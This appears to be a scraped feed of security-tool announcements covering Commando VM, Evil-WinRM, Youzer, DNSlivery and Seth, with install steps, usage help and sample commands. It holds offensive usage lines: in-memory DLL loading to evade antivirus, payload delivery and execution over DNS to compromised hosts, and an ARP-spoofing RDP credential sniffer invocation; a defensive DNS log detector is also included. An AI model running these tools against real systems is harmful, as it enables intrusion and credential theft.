UPDATE: MITRE CALDERA 2.2.0

PenTestIT RSS Feed
If you remember, I wrote briefly about this automated adversary emulation system in my post titled List of Adversary Emulation Tools. Some time back, an update, MITRE CALDERA 2.2.0, was released. A lot of changes have been made to create this updated version and, as always, this post discusses the different updates made to [...]
Read more about UPDATE: MITRE CALDERA 2.2.0
The post UPDATE: MITRE CALDERA 2.2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-2-0/

Commando VM v2.0 – The First Full Windows-based Penetration Testing Virtual Machine Distribution

Welcome to CommandoVM, a fully customizable, Windows-based security distribution for penetration testing and red teaming. For detailed install instructions or more information please see our blog.

Installation (Install Script)

Requirements:
- Windows 7 Service Pack 1 or Windows 10
- 60 GB Hard Drive
- 2 GB RAM

Recommended:
- Windows 10
- 80+ GB Hard Drive
- 4+ GB RAM
- 2 network adapters
- Enable Virtualization support for VM (REQUIRED FOR KALI OR DOCKER)

Instructions

Standard install:
1. Create and configure a new Windows Virtual Machine.
2. Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain.
3. Take a snapshot of your machine!
4. Download and copy install.ps1 onto your newly configured machine.
5. Open PowerShell as an Administrator.
6. Enable script execution by running the following command: Set-ExecutionPolicy Unrestricted
7. Finally, execute the installer script as follows: .\install.ps1
   You can also pass your password as an argument: .\install.ps1 -password <your password>

The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Custom install:
1. Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder.
2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the "packages" section. Tools are available from our package list or from the chocolatey repository.
3. Open an administrative PowerShell window and enable script execution: Set-ExecutionPolicy Unrestricted -f
4. Change to the unzipped project directory: cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
5. Execute the install with the -profile_file argument: .\install.ps1 -profile_file .\profile.json

For more detailed instructions about custom installations, see our blog.

Installing a new package

Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system: cinst github

Staying up to date

Type the following command to update all of the packages to the most recent version: cup all

Installed Tools

Active Directory Tools: Remote Server Administration Tools (RSAT), SQL Server Command Line Utilities, Sysinternals
Command & Control: Covenant, PoshC2, WMImplant, WMIOps
Developer Tools: Dep, Git, Go, Java, Python 2, Python 3 (default), Ruby, Ruby Devkit, Visual Studio 2017 Build Tools (Windows 10), Visual Studio Code
Docker: Amass, SpiderFoot
Evasion: CheckPlease, Demiguise, DefenderCheck, DotNetToJScript, Invoke-CradleCrafter, Invoke-DOSfuscation, Invoke-Obfuscation, Invoke-Phant0m, Not PowerShell (nps), PS>Attack, PSAmsi, Pafishmacro, PowerLessShell, PowerShdll, StarFighters
Exploitation: ADAPE-Script, API Monitor, CrackMapExec, CrackMapExecWin, DAMP, EvilClippy, Exchange-AD-Privesc, FuzzySec's PowerShell-Suite, FuzzySec's Sharp-Suite, Generate-Macro, GhostPack (Rubeus, SafetyKatz, Seatbelt, SharpDPAPI, SharpDump, SharpRoast, SharpUp, SharpWMI), GoFetch, Impacket, Invoke-ACLPwn, Invoke-DCOM, Invoke-PSImage, Invoke-PowerThIEf, Juicy Potato, Kali Binaries for Windows, LuckyStrike, MetaTwin, Metasploit, Mr. Unikod3r's RedTeamPowershellScripts, NetshHelperBeacon, Nishang, Orca, PSReflect, PowerLurk, PowerPriv, PowerSploit, PowerUpSQL, PrivExchange, RottenPotatoNG, Ruler, SharpClipHistory, SharpExchangePriv, SharpExec, SpoolSample, SharpSploit, UACME, impacket-examples-windows, vssown, Vulcan
Information Gathering: ADACLScanner, ADExplorer, ADOffline, ADRecon, BloodHound, dnsrecon, FOCA, Get-ReconInfo, GoBuster, GoWitness, NetRipper, Nmap, PowerView (Dev branch included), SharpHound, SharpView, SpoolerScanner, Watson
Kali Linux: kali-linux-default, kali-linux-xfce, VcXsrv
Networking Tools: Citrix Receiver, OpenVPN, Proxycap, PuTTY, Telnet, VMWare Horizon Client, VMWare vSphere Client, VNC-Viewer, WinSCP, Windump, Wireshark
Password Attacks: ASREPRoast, CredNinja, DomainPasswordSpray, DSInternals, Get-LAPSPasswords, Hashcat, Internal-Monologue, Inveigh, Invoke-TheHash, KeeFarce, KeeThief, LAPSToolkit, MailSniper, Mimikatz, Mimikittenz, RiskySPN, SessionGopher
Reverse Engineering: DNSpy, Flare-Floss, ILSpy, PEview, Windbg, x64dbg
Utilities: 7zip, Adobe Reader, AutoIT, Cmder, CyberChef, Explorer Suite, Gimp, Greenshot, Hashcheck, Hexchat, HxD, Keepass, MobaXterm, Mozilla Thunderbird, Neo4j Community Edition, Notepad++, Pidgin, Process Hacker 2, SQLite DB Browser, Screentogif, Shellcode Launcher, Sublime Text 3, TortoiseSVN, VLC Media Player, Winrar, yEd Graph Tool
Vulnerability Analysis: AD Control Paths, Egress-Assess, Grouper2, NtdsAudit, PwndPasswordsNTLM, zBang
Web Applications: Burp Suite, Fiddler, Firefox, OWASP Zap, Subdomain-Bruteforce, Wfuzz
Wordlists: FuzzDB, PayloadsAllTheThings, SecLists, Probable-Wordlists, RobotsDisallowed

Legal Notice

This download configuration script is provided to assist penetration testers in creating handy and versatile toolboxes for offensive engagements. It provides a convenient interface for them to obtain a useful set of pentesting Tools directly from their original sources. Installation and use of this script is subject to the Apache 2.0 License. You as a user of this script must review, accept and comply with the license terms of each downloaded/installed package listed below.
By proceeding with the installation, you are accepting the license terms of each package, and acknowledging that your use of each package will be subject to its respective license terms.

List of package licenses:

Download Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/qfDDkq3fmTU/commando-vm-v20-first-full-windows.html

List of Open Source C2 Post-Exploitation Frameworks

PenTestIT RSS Feed
This post has been lying in my drafts for more than a year with edits all over. But two days ago, it was announced that PowerShell Empire would no longer be supported by its authors. Hence, just like I curated a list of adversary emulation tools, I finalized this list of open source C2 post-exploitation [...]
Read more about List of Open Source C2 Post-Exploitation Frameworks
The post List of Open Source C2 Post-Exploitation Frameworks appeared first on PenTestIT.

Link: http://pentestit.com/list-of-open-source-c2-post-exploitation-frameworks/

Evil-Winrm – The Ultimate WinRM Shell For Hacking/Pentesting

The ultimate WinRM shell for hacking/pentesting.

By: CyberVaca@HackPlayers

Description & Purpose

This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators.

This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.

Features
- Command history
- WinRM command completion
- Local files completion
- Upload and download files
- List remote machine services
- FullLanguage PowerShell language mode
- Load PowerShell scripts
- Load in-memory dll files, bypassing some AVs
- Load in-memory C# (C Sharp) compiled exe files, bypassing some AVs
- Colorization of output messages (can be disabled optionally)

Help

Usage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]
    -i, --ip IP                      Remote host IP or hostname (required)
    -P, --port PORT                  Remote host port (default 5985)
    -u, --user USER                  Username (required)
    -p, --password PASS              Password
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts path (required)
    -e, --executables EXES_PATH      C# executables path (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -V, --version                    Show version
    -h, --help                       Display this help message

Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.
~$ sudo gem install winrm winrm-fs colorize stringio

Installation & Quick Start

Step 1. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
Step 2. Ready. Just launch it!
~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

If you don't want to put the password in clear text, you can optionally omit the -p argument and the password will be prompted for, preventing it from being shown.
To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem
Step 1. Install it: gem install evil-winrm
Step 2. Ready. Just launch it!
~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Documentation

Basic commands
- upload: local files can be auto-completed using the tab key. It is not needed to put a remote_path if the local file is in the same directory as the evil-winrm.rb file. usage: upload local_path remote_path
- download: it is not needed to set local_path if the remote file is in the current directory. usage: download remote_path local_path
- services: list all services. No administrator permissions needed.
- menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown.

Load powershell scripts
To load a ps1 file you just have to type the name (auto-completion using the tab key allowed). The scripts must be in the path set at the -s argument. Type menu again and see the loaded functions.

Advanced commands
- Invoke-Binary: allows exes compiled from C# to be executed in memory. The name can be auto-completed using the tab key and allows up to 3 parameters. The executables must be in the path set at the -e argument.
- l04d3r-LoadDll: allows loading dll libraries in memory; it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll")) The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.

Extra features
To disable colors just modify this variable in the code: $colors_enabled. Set it to false: $colors_enabled = false

Credits:
Main author: cybervaca
Collaborators, developers, documenters, testers and supporters: OscarAkaElvis, jarilaos, vis0r
Hat tip to: Alamot for his original code. 3v4Si0N for his awesome dll loader.

Disclaimer & License
This script is licensed under LGPLv3+. Direct link to License.
Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.

Download Evil-Winrm

Link: http://www.kitploit.com/2019/07/evil-winrm-ultimate-winrm-shell-for.html

Commando VM v1.3 – The First Full Windows-based Penetration Testing Virtual Machine Distribution

Welcome to CommandoVM, a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements:
- Windows 7 Service Pack 1 or Windows 10
- 60 GB Hard Drive
- 2 GB RAM

Recommended:
- Windows 10
- 80+ GB Hard Drive
- 4+ GB RAM
- 2 network adapters
- Enable Virtualization support for VM

Instructions
1. Create and configure a new Windows Virtual Machine.
2. Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain.
3. Take a snapshot of your machine!
4. Download and copy install.ps1 onto your newly configured machine.
5. Open PowerShell as an Administrator.
6. Enable script execution by running the following command: Set-ExecutionPolicy Unrestricted
7. Finally, execute the installer script as follows: .\install.ps1
   You can also pass your password as an argument: .\install.ps1 -password <your password>

The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.

Installing a new package

Commando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system: cinst github

Staying up to date

Type the following command to update all of the packages to the most recent version: cup all

Installed Tools

Active Directory Tools: Remote Server Administration Tools (RSAT), SQL Server Command Line Utilities, Sysinternals
Command & Control: Covenant, PoshC2, WMImplant, WMIOps
Developer Tools: Dep, Git, Go, Java, Python 2, Python 3 (default), Ruby, Ruby Devkit, Visual Studio 2017 Build Tools (Windows 10), Visual Studio Code
Evasion: CheckPlease, Demiguise, DefenderCheck, DotNetToJScript, Invoke-CradleCrafter, Invoke-DOSfuscation, Invoke-Obfuscation, Invoke-Phant0m, Not PowerShell (nps), PS>Attack, PSAmsi, Pafishmacro, PowerLessShell, PowerShdll, StarFighters
Exploitation: ADAPE-Script, API Monitor, CrackMapExec, CrackMapExecWin, DAMP, EvilClippy, Exchange-AD-Privesc, FuzzySec's PowerShell-Suite, FuzzySec's Sharp-Suite, Generate-Macro, GhostPack (Rubeus, SafetyKatz, Seatbelt, SharpDPAPI, SharpDump, SharpRoast, SharpUp, SharpWMI), GoFetch, Impacket, Invoke-ACLPwn, Invoke-DCOM, Invoke-PSImage, Invoke-PowerThIEf, Juicy Potato, Kali Binaries for Windows, LuckyStrike, MetaTwin, Metasploit, Mr. Unikod3r's RedTeamPowershellScripts, NetshHelperBeacon, Nishang, Orca, PSReflect, PowerLurk, PowerPriv, PowerSploit, PowerUpSQL, PrivExchange, RottenPotatoNG, Ruler, SharpClipHistory, SharpExchangePriv, SharpExec, SpoolSample, SharpSploit, UACME, impacket-examples-windows, vssown, Vulcan
Information Gathering: ADACLScanner, ADExplorer, ADOffline, ADRecon, BloodHound, dnsrecon, FOCA, Get-ReconInfo, GoBuster, GoWitness, NetRipper, Nmap, PowerView (Dev branch included), SharpHound, SharpView, SpoolerScanner, Watson
Networking Tools: Citrix Receiver, OpenVPN, Proxycap, PuTTY, Telnet, VMWare Horizon Client, VMWare vSphere Client, VNC-Viewer, WinSCP, Windump, Wireshark
Password Attacks: ASREPRoast, CredNinja, DomainPasswordSpray, DSInternals, Get-LAPSPasswords, Hashcat, Internal-Monologue, Inveigh, Invoke-TheHash, KeeFarce, KeeThief, LAPSToolkit, MailSniper, Mimikatz, Mimikittenz, RiskySPN, SessionGopher
Reverse Engineering: DNSpy, Flare-Floss, ILSpy, PEview, Windbg, x64dbg
Utilities: 7zip, Adobe Reader, AutoIT, Cmder, CyberChef, Explorer Suite, Gimp, Greenshot, Hashcheck, Hexchat, HxD, Keepass, MobaXterm, Mozilla Thunderbird, Neo4j Community Edition, Notepad++, Pidgin, Process Hacker 2, SQLite DB Browser, Screentogif, Shellcode Launcher, Sublime Text 3, TortoiseSVN, VLC Media Player, Winrar, yEd Graph Tool
Vulnerability Analysis: AD Control Paths, Egress-Assess, Grouper2, NtdsAudit, PwndPasswordsNTLM, zBang
Web Applications: Burp Suite, Fiddler, Firefox, OWASP Zap, Subdomain-Bruteforce, Wfuzz
Wordlists: FuzzDB, PayloadsAllTheThings, SecLists, Probable-Wordlists, RobotsDisallowed

Changelog:

1.3 – June 28 2019
- Added RottenPotatoNG https://github.com/breenmachine/RottenPotatoNG #63
- Added Juicy Potato https://github.com/ohpe/juicy-potato #63, #64
- Added Watson https://github.com/rasta-mouse/Watson #64
- Added PwndPasswordsNTLM https://github.com/JacksonVD/PwnedPasswordsNTLM #67
- Added FOCA https://github.com/JacksonVD/PwnedPasswordsNTLM #71
- Added Vulcan https://github.com/praetorian-code/vulcan
- Added SharpClipHistory https://github.com/mwrlabs/SharpClipHistory
- Added NetRipper https://github.com/NytroRST/NetRipper
- Added RobotsDisallowed https://github.com/danielmiessler/RobotsDisallowed
- Added Probable-Wordlists https://github.com/berzerk0/Probable-Wordlists
- Added SharpSploit https://github.com/cobbr/SharpSploit
- Changed WinRM configuration #65
- Un-hardened UNC file paths #68
- Fixed install issues with Covenant #61, #76

1.2 – May 31 2019
- Added recommended hardware settings #20, #17
- Added DomainPasswordSpray https://github.com/dafthack/DomainPasswordSpray #2
- Added GoBuster https://github.com/OJ/gobuster #39
- Added Wfuzz https://github.com/xmendez/wfuzz #40
- Added Notepad++ #30
- Added TextFX plugin for Notepad++
- Added Explorer Suite (CFF Explorer)

1.1 – April 30 2019
- Added AD-Control-Paths https://github.com/ANSSI-FR/AD-control-paths/releases
- Added DefenderCheck https://github.com/matterpreter/DefenderCheck
- Added dnsrecon https://github.com/darkoperator/dnsrecon
- Added EvilClippy https://github.com/outflanknl/EvilClippy
- Added NtdsAudit https://github.com/Dionach/NtdsAudit
- Added SharpExec https://github.com/anthemtotheego/SharpExec
- Added Subdomain-Bruteforce https://github.com/visualbasic6/subdomain-bruteforce
- Fixed issue #18 with PATH
- Added Commando Logos with transparent backgrounds to $Home\Pictures
- Pinned Firefox to Taskbar
- Fixed misspellings in Readme #42/#43
- Added Ruby and Ruby Devkit #1
- Updated Rubeus package to current version (1.4.2) #31

1.0.2 – April 10 2019
- Added missing 'seclists.fireeye' package to packages.json #38

1.0.1 – March 31 2019
- Used https instead of http to install boxstarter #10

Download Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/QeW-17PeFBU/commando-vm-v13-first-full-windows.html

Youzer – Fake User Generator For Active Directory Environments

Fake User Generator for Active Directory Environments

Introduction

The goal of Youzer is to create information-rich Active Directory environments. It uses the python3 library 'faker' to generate random accounts.
pip3 install faker

You can either supply a wordlist or have the passwords generated. The generated option is great for testing things like hashcat rule masks. The wordlist option is useful when wanting to seed a specific password list into an environment, or to practice dictionary attacks.

The output is a CSV and a PowerShell script, both of which can be copied to the target. When executed, the PowerShell script binds over LDAP, so it doesn't rely on the newer Active Directory modules, and creates each user object. Currently the OUs need to exist, but this tool is a sub-project of 'Labseed', where the Active Directory structure will be created.

RoadMap
- Generate multiple departments (OUs)
- Generate grouping structure and randomly assign
- Implement additional Faker object options to populate other LDAP fields such as Address, Region
- Create an organisational chart of the nested grouping structure

Examples

Youzer can create 100,000 users in under 30 seconds and 1,000,000 users in around 3 minutes.
[-] Domain Name set to : example
[*] Writing to output file : sales_example.csv
[!] Generating 100000 users in password generate mode
[!] Creating Powershell script for import : sales_example.ps1
python3 youzer.py --generate --generate_length 20 --ou --domain example  20.35s user 0.11s system 95% cpu 21.354 total

Creating 1000 user accounts with a randomly generated alphanumeric password choice of 20 characters:
python3 youzer.py --generate --generate_length 20 --ou "ou=sales,dc=example,dc=domain" --domain example --users 1000 --output sales_example.csv

version : 0.1
author : @lorentzenman
team : SpiderLabs
[-] Domain Name set to : example
[*] Writing to output file : sales_example.csv
[!] Generating 1000 users in password generate mode
[!] Creating Powershell script for import : sales_example.ps1

Sample output from the CSV file created with the generate option:
Name,GivenName,sn,ou,password,address,description
Dennis Shaw,Dennis,Shaw,"ou=sales,dc=example,dc=domain",VwVeloi09FaECRdNbbXD,
Sam Francis,Sam,Francis,"ou=sales,dc=example,dc=domain",qhitxgjDW4gZFuraLJbB,
Ellie Freeman,Ellie,Freeman,"ou=sales,dc=example,dc=domain",7qbLcknqlPtpkOzdLyw3,
Terence Arnold,Terence,Arnold,"ou=sales,dc=example,dc=domain",lumPMbDk1YomypRj26by,
Anne Murphy,Anne,Murphy,"ou=sales,dc=example,dc=domain",6r42EGGoEJYe9PydHRTV,
Wendy Smith,Wendy,Smith,"ou=sales,dc=example,dc=domain",tKI2zFUOU8XdK4ZTUJas,
Jay Lyons,Jay,Lyons,"ou=sales,dc=example,dc=domain",wxEIbw18tW9uFYXtMI9H,
Jonathan White,Jonathan,White,"ou=sales,dc=example,dc=domain",caoHcm2Y90lIH7zskJYr,
Adam Roberts,Adam,Roberts,"ou=sales,dc=example,dc=domain",Qu0y7mlb2haQQddxYrcN,
Georgina Jones,Georgina,Jones,"ou=sales,dc=example,dc=domain",rYBjxs4tpj9Qza7HcKYI,
Lee Newton,Lee,Newton,"ou=sales,dc=example,dc=domain",6CVlBvEutc3Ahco2UI5q,
Aaron Smith,Aaron,Smith,"ou=sales,dc=example,dc=domain",hmSSoKILfvrHuHbPTDIQ,
Max Hall,Max,Hall,"ou=sales,dc=example,dc=domain",11Ys9Zdk2M8J1JAScBkP,
Kimberley Douglas,Kimberley,Douglas,"ou=sales,dc=example,dc=domain",WQ9285gSHv2MXkwoLYlg,
Denise Fisher,Denise,Fisher,"ou=sales,dc=example,dc=domain",CT1pbfAnCoezuyrJbQX9,

Creating 1000 user accounts from a source word list:
python3 youzer.py --wordlist ~/tools/pw/Probable-Wordlists/Real-Passwords/Top12Thousand-probable-v2.txt --ou "ou=IT,dc=example,dc=domain" --domain example --users 1000 --output IT_example.csv

version : 0.1
author : @lorentzenman
team : SpiderLabs
[-] Domain Name set to : example
[*] Writing to output file : IT_example.csv
[!] Generating 1000 users in wordlist mode
[!] Creating Powershell script for import : IT_example.ps1

Sample output of the CSV file from the above wordlist option:
Name,GivenName,sn,ou,password,address,description
Rhys Parker,Rhys,Parker,"ou=IT,dc=example,dc=domain",houston,
Geoffrey Harris,Geoffrey,Harris,"ou=IT,dc=example,dc=domain",clothing,
Georgia Davis,Georgia,Davis,"ou=IT,dc=example,dc=domain",spotty,
Gemma Norris,Gemma,Norris,"ou=IT,dc=example,dc=domain",brendan1,
Daniel Marsh,Daniel,Marsh,"ou=IT,dc=example,dc=domain",pauline,
Dominic Harvey,Dominic,Harvey,"ou=IT,dc=example,dc=domain",devin,
Teresa Stokes,Teresa,Stokes,"ou=IT,dc=example,dc=domain",snapple,
Joanna Morgan,Joanna,Morgan,"ou=IT,dc=example,dc=domain",volcom,
Oliver Middleton,Oliver,Middleton,"ou=IT,dc=example,dc=domain",master,

Download Youzer

Link: http://www.kitploit.com/2019/07/youzer-fake-user-generator-for-active.html

DNSlivery – Easy Files And Payloads Delivery Over DNS

Easy files and payloads delivery over DNS.AcknowledgmentsThis project has been originally inspired by PowerDNS and Joff Thyer’s technical segment on the Paul’s Security Weekly podcast #590 (youtu.be/CP6cIwFJswQ).DescriptionTL;DRDNSlivery allows delivering files to a target using DNS as the transport protocol.Features:allows to print, execute or save files to the targetdoes not require any client on the targetdoes not require a full-fledged DNS server What problem are you trying to solve?Easily deliver files and/or payloads to a compromised target where classic web delivery is not possible and without the need for a dedicated client software. This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy.Even though more complete DNS tunneling tools already exist (s.a. dnscat2 and iodine), they all require to run a dedicated client on the target. The problem is that there is probably no other way then DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools require to already have a DNS communication channel.In comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target.How does it work?Just like most DNS tunneling tools, DNSlivery uses TXT records to store the content of files in their base64 representation. However, it does not require to setup a full-fledged DNS server to work. Instead, it uses the scapy library to listen for incoming DNS packets and craft the desired response.As most files do not fit in a single TXT record, DNSlivery will create multiple ordered records containing base64 chunks of the file. 
As an example, the above diagram illustrates the delivery of the 42nd chunk of the file named file.In order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file:a simple cleartext launchera reliable base64 encoded stagerThis two-stages delivery process is required to add features to the stager (s.a. handling lost DNS responses) that would otherwise not fit in a single TXT record.Note on target compatibilityCurrently, only PowerShell targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know @no0be if this is a feature that you would like to see being implemented.RequirementsDNSlivery does not require to build a complex server infrastructure. In fact, there are only two simple requirements:be able to create a NS record in your public DNS zonehave a Linux server capable of receiving udp/53 traffic from the InternetSetupDNS ZoneThe first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new NS record in your domain. 
As an example, I created the following record to delegate the sub-domain dnsd.no0.be to the server at vps.no0.be:

    dnsd IN NS vps.no0.be.

If your zone is managed by a third-party provider, refer to their documentation to create the NS record.

DNSlivery
The only requirements to run DNSlivery are python3 and its scapy library.

    git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery
    pip install -r requirements.txt

Usage
Server
DNSlivery serves all files of a given directory (pwd by default) and needs to be run with root privileges to listen for incoming udp/53 packets.

    usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver

    DNSlivery – Easy files and payloads delivery over DNS

    positional arguments:
      interface             interface to listen to DNS traffic
      domain                FQDN name of the DNS zone
      nameserver            FQDN name of the server running DNSlivery

    optional arguments:
      -h, --help            show this help message and exit
      -p PATH, --path PATH  path of directory to serve over DNS (default: pwd)
      -s SIZE, --size SIZE  size in bytes of base64 chunks (default: 255)
      -v, --verbose         increase verbosity

Example:

    $ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-delivery

    DNSlivery – Easy files and payloads delivery over DNS

    [*] File "file" ready for delivery at file.dnsd.no0.be (7 chunks)
    [*] Listening for DNS queries...

Note on filename normalization
As the charset allowed for domain names is much more restrictive than for UNIX filenames (per RFC1035), DNSlivery performs normalization when required.

Example:

    [*] File "My Awesome Powershell Script ;).ps1" ready for delivery at my-awesome-powershell-script---ps1.dnsd.no0.be (1891 chunks)

Be aware that the current normalization code is not perfect, as it does not take overlapping filenames or the size limit into account.

Target
On the target, start by retrieving the launcher of the desired file by requesting its dedicated TXT record.
The following three launchers are supported:

    Action    Launcher                     Description
    Print     [filename].print.[domain]    (Default) Print the delivered file to the console
    Execute   [filename].exec.[domain]     Execute the delivered file (useful for scripts)
    Save      [filename].save.[domain]     Save the delivered file to disk (useful for binaries)

    nslookup -type=txt [filename].[stager].[domain]

Then, simply copy and paste the launcher quoted in the DNS response into a PowerShell console to retrieve the file on the target.
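From the defender's side, the two things that stand out in resolver logs are the documented launcher names ([filename].print|exec|save.[domain]) and a burst of TXT answers that are nothing but long base64. The following is an added example, not DNSlivery's own code: it runs those two heuristics over constructed log lines (the "client|qname|qtype|rdata" format and the chunk naming scheme are assumptions made for the example).

```python
import base64
import re
from collections import defaultdict

# Added example, not DNSlivery's own code: heuristics for spotting the delivery
# pattern described above in resolver/sensor logs. Assumed (constructed) log
# format: "client|qname|qtype|rdata", one DNS answer per line.

LAUNCHER_LABELS = {"print", "exec", "save"}      # documented launcher records
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def looks_like_base64_chunk(rdata, min_len=64):
    """A long TXT payload that is strictly valid base64, as a file chunk is."""
    if len(rdata) < min_len or not B64_RE.match(rdata):
        return False
    try:
        base64.b64decode(rdata, validate=True)
    except ValueError:
        return False
    return True

def launcher_record(qname):
    """[filename].print|exec|save.[domain] -> the action label, else None."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) >= 3 and labels[1] in LAUNCHER_LABELS:
        return labels[1]
    return None

def analyze(lines, chunk_threshold=5):
    """Return (kind, client, name, detail) alerts for launcher and chunk traffic."""
    alerts = []
    chunks = defaultdict(int)                   # (client, parent name) -> count
    for line in lines:
        client, qname, qtype, rdata = line.split("|", 3)
        if qtype != "TXT":
            continue
        action = launcher_record(qname)
        if action:
            alerts.append(("launcher", client, qname, action))
        elif looks_like_base64_chunk(rdata):
            # Assumption: chunk records hang off a common parent name, so the
            # qname minus its leftmost label groups one file's chunks together.
            parent = qname.split(".", 1)[1]
            chunks[(client, parent)] += 1
    for (client, parent), n in chunks.items():
        if n >= chunk_threshold:
            alerts.append(("chunked_delivery", client, parent, n))
    return alerts

def constructed_log():
    """Constructed sample: one launcher lookup, six chunks, two benign TXT records."""
    lines = ["10.0.0.7|file.print.dnsd.example.test|TXT|<cleartext launcher one-liner>"]
    for i in range(6):
        chunk = base64.b64encode(b"constructed chunk %d " % i * 5).decode()
        lines.append("10.0.0.7|%d.file.dnsd.example.test|TXT|%s" % (i, chunk))
    lines.append("10.0.0.9|example.test|TXT|v=spf1 -all")
    lines.append("10.0.0.9|_dmarc.example.test|TXT|v=DMARC1; p=reject")
    return lines
```

Calling analyze(constructed_log()) yields one launcher alert and one chunked_delivery alert for 10.0.0.7, while the SPF and DMARC records of 10.0.0.9 stay quiet; raise chunk_threshold to suit your own TXT baseline.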

Link: http://feedproxy.google.com/~r/PentestTools/~3/d-u-FwvPkdQ/dnslivery-easy-files-and-payloads.html

Seth – Perform A MitM Attack And Extract Clear Text Credentials From RDP Connections

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage
Run it like this:

    $ ./seth.sh <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]

Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.

The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using; currently it is only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.

The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want to use Seth in combination with Responder: use Responder to gain a Man-in-the-Middle position and run Seth at the same time.
Run seth.py -h for more information:

    usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
                   [-j INJECT] -c CERTFILE -k KEYFILE
                   target_host [target_port]

    RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

    positional arguments:
      target_host           target host of the RDP service
      target_port           TCP port of the target RDP service (default 3389)

    optional arguments:
      -h, --help            show this help message and exit
      -d, --debug           show debug information
      -f, --fake-server     perform a 'fake server' attack
      -p LISTEN_PORT, --listen-port LISTEN_PORT
                            TCP port to listen on (default 3389)
      -b BIND_IP, --bind-ip BIND_IP
                            IP address to bind the fake service to (default all)
      -g {0,1,3,11}, --downgrade {0,1,3,11}
                            downgrade the authentication protocol to this (default 3)
      -j INJECT, --inject INJECT
                            command to execute via key press event injection
      -c CERTFILE, --certfile CERTFILE
                            path to the certificate file
      -k KEYFILE, --keyfile KEYFILE
                            path to the key file

For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for countermeasures.

You can also watch a twenty minute presentation including a demo (starting at 14:00) on YouTube: https://www.youtube.com/watch?v=wdPkY7gykf4

Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s

Demo
The following output shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.

    # ./seth.sh eth1 192.168.57.{103,2,102}

